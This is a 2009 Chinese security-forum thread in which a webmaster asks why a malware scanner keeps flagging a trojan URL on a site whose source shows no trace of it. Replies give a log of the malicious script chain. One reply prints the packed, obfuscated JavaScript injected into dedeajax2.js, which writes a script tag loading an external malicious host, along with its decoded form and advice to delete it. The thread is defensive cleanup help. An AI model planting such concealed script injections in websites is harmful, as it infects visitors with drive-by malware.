瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 我的网站被挂马了,但是找不到木马url,高手指点下
222ddd3 - 2009-12-27 18:52:00
http://lx.niupan.com/xingxuetupian/xixixi/yt.htm?123  瑞星安全网站联盟提示,有1条URL发现被挂木马 ,网页:http://www.ccee.org.cn/  但是我每次检查,在页面的源码里都找不到这个地址,这个木马,每次隔几天就来一次,每次我看源码都找不到这个木马地址,这是怎么回事啊?


网页:http://www.ccee.org.cn/
检测时间:2009-12-25 9:49:040
木马网址:
http://lx.niupan.com/xingxuetupian/xixi
shellcode溢出攻击
解决方案



网页:http://www.ccee.org.cn/
检测时间:2009-12-25 0:48:47
木马网址:
http://lx.niupan.com/xingxuetupian/xixi
shellcode溢出攻击
解决方案



网页:http://www.ccee.org.cn/
检测时间:2009-12-22 5:23:39
木马网址:
http://lx.niupan.com/xingxuetupian/xixi
shellcode溢出攻击
解决方案



网页:http://www.ccee.org.cn/
检测时间:2009-12-20 15:07:58
木马网址:
http://lx.niupan.com/xingxuetupian/xixi
shellcode溢出攻击
解决方案



网页:http://www.ccee.org.cn/
检测时间:2009-12-18 9:36:30
木马网址:
http://lx.niupan.com/xingxuetupian/xixi
shellcode溢出攻击
解决方案



网页:http://www.ccee.org.cn/
检测时间:2009-12-17 22:40:23
木马网址:
http://lx.niupan.com/xingxuetupian/xixi

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; TencentTraveler 4.0; .NET CLR 2.0.50727)
aaccbbdd - 2009-12-27 20:54:00
貌似那地址不是网马链接。。。
222ddd3 - 2009-12-27 22:49:00
那为什么瑞星提示这个是木马网址呢
networkedition - 2009-12-28 9:39:00
那个就是恶意链接地址分析如下:
Log is generated by FreShow.
[wide]http://lx.niupan.com/xingxuetupian/xixixi/yt.htm?1234
    [script]http://lx.niupan.com/xingxuetupian/xixixi/nop.jpg
    [script]http://lx.niupan.com/xingxuetupian/xixixi/ml.jpg
    [script]http://lx.niupan.com/xingxuetupian/xixixi/rl.jpg
        [object]http://www.tnbz.com/152.css
    [script]http://lx.niupan.com/xingxuetupian/xixixi/kl.jpg
在服务器上网站源代码中查找:http://lx.niupan.com/xingxuetupian/xixixi/yt.htm?1234 试试
222ddd3 - 2009-12-28 11:25:00
我整个站都检查过,都没发现这个木马地址,而且我在这个服务器上的另外两个网站也是出现同样的情况,但是我把三个网站的内容都检查过。就是没有发现这个木马地址,会不会是这个服务器上的其他网站中毒了,传染到我的网站上的?
networkedition - 2009-12-28 11:33:00
服务器是托管的么:kaka2:  你说的这种可能性不太大。
222ddd3 - 2009-12-28 22:54:00
我是购买合租的空间,这个木马几天来一次,每次看到瑞星的风险提示,我检查网站,都找不到这个木马地址,真是头疼啊。
Cool_wXd - 2009-12-29 9:04:00


引用:
原帖由 222ddd3 于 2009-12-28 22:54:00 发表
我是购买合租的空间,这个木马几天来一次,每次看到瑞星的风险提示,我检查网站,都找不到这个木马地址,真是头疼啊。


在dedeajax2.js里面找这段代码

[复制到剪贴板]
CODE:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.d("<b 6=5 c=4://8.9.2/a/7.1?0美女图片></b>");',62,14,'123456|aspx|com|document|http|javascript|language|login|lx|niupan|passport|script|src|writeln'.split('|'),0,{}));}


他的明文代码是

[复制到剪贴板]
CODE:
document.writeln("<script language=javascript src=http://lx.niupan.com/passport/login.aspx?123456n|?</script>");;}


你把这部分加密的代码删除了就可以了~
networkedition - 2009-12-29 10:35:00
参考8楼的方法。
1
查看完整版本: 我的网站被挂马了,但是找不到木马url,高手指点下
© 2000 - 2025 Rising Corp. Ltd.